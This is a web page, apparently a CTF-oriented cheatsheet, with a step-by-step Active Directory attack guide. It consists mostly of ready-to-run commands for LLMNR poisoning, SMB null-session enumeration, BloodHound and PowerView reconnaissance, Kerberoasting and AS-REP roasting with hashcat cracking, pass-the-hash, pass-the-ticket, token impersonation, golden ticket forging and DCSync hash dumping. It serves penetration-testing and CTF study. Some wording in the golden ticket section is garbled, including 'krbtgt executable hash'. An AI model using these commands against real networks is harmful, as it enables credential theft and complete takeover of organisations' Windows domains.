Skip to content
CTF

Active Directory Attacks

Comprehensive guide to AD exploitation: BloodHound, Kerberoasting, AS-REP, and Lateral Movement

Active Directory Attacks

1. Initial Reconnaissance (No Credentials)

Before you have a user, you can still find things.

  • LLMNR/NBT-NS Poisoning: Capture hashes from the network.
    BASH 
    sudo responder -I eth0 -dwv
  • SMB Null Session:
    BASH 
    enum4linux -a <IP>
crackmapexec smb <IP> -u '' -p '' --shares

2. Enumeration (With Credentials)

Once you have valid credentials (even low privilege).

BloodHound (The Map)

  1. Ingestor: Run SharpHound on the victim (or Python ingestor from attacker).
    POWERSHELL 
    # On Victim
.\SharpHound.exe -c All

# On Attacker (if you have creds)
bloodhound-python -u 'user' -p 'pass' -ns <IP> -d domain.local -c All
  2. Analysis:
    • Find Shortest Path to Domain Admins.
    • Look for Kerberoastable Users.
    • Look for AS-REP Roasting opportunities.

PowerView (Manual)

POWERSHELL 
Import-Module .\PowerView.ps1
# Get current domain
Get-NetDomain
# Find Domain Admins
Get-NetGroupMember -GroupName "Domain Admins"
# Find where DAs are logged in (requires local admin usually)
Invoke-UserHunter
# Find local admin access
Find-LocalAdminAccess

3. Kerberos Attacks

Kerberoasting

Request TGS for services. If the service account has a weak password, you can crack it.

  1. Request:
    BASH 
    # Impacket
GetUserSPNs.py domain.com/user:pass -request

# Rubeus (On victim)
.\Rubeus.exe kerberoast /outfile:hashes.txt
  2. Crack:
    BASH 
    hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

AS-REP Roasting

Users with "Do not require Kerberos preauthentication" enabled.

  1. Check:
    BASH 
    # Impacket
GetNPUsers.py domain.com/ -usersfile users.txt -format hashcat -no-pass
  2. Crack:
    BASH 
    hashcat -m 18200 hashes.txt rockyou.txt

4. Lateral Movement

Pass-the-Hash (PtH)

If you have an NTLM hash, you don't need the password.

BASH 
crackmapexec smb <IP> -u Administrator -H <NTLM_HASH>
evil-winrm -i <IP> -u Administrator -H <NTLM_HASH>
psexec.py domain/user@<IP> -hashes :<NTLM_HASH>

Pass-the-Ticket (PtT)

If you find a .kirbi or .ccache file (Kerberos ticket).

  1. Export: export KRB5CCNAME=/path/to/ticket.ccache
  2. Use: python3 psexec.py ... -k -no-pass

Over-Pass-the-Hash

Use NTLM hash to request a Kerberos TGT (Ticket Granting Ticket).

POWERSHELL 
.\Rubeus.exe asktgt /user:Administrator /rc4:<NTLM_HASH> /ptt

Token Impersonation (Incognito)

If you are local admin, you can steal tokens of logged-in users.

BASH 
# Meterpreter
load incognito
list_tokens -u
impersonate_token "DOMAIN\\Administrator"

5. Domain Dominance

Golden Ticket

Forge a TGT valid for any user (including Krbtgt). Valid for 10 years. Needs:

  1. krbtgt executable hash.
  2. Domain SID. Command:
BASH 
ticketer.py -nthash <krbtgt_hash> -domain-sid <SID> -domain domain.local administrator
export KRB5CCNAME=administrator.ccache
psexec.py domain.local/administrator@<DC_IP> -k -no-pass

DCSync (Secrets Dump)

Simulate a Domain Controller to request password hashes. Needs: DA privileges or DS-Replication-Get-Changes.

BASH 
secretsdump.py domain/user:pass@<DC_IP> -just-dc
Back to Cheatsheets
On this page